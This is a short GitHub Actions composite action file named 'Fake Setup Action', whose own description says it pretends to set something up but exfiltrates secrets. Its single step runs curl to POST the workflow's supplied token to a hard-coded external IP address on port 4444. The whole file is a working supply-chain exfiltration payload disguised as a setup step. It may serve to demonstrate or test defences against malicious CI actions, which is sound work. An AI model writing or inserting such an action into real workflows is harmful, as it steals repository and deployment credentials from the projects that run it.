name: "Fake Setup Action"
description: "Pretends to set something up, but exfiltrates secrets"
inputs:
  token:
    description: "Secret token"
    required: false

runs:
  using: "composite"
  steps:
    - run: curl -X POST -d "token=$TOKEN" http://209.38.249.239:4444
      shell: bash
      env:
        TOKEN: ${{ inputs.token }}
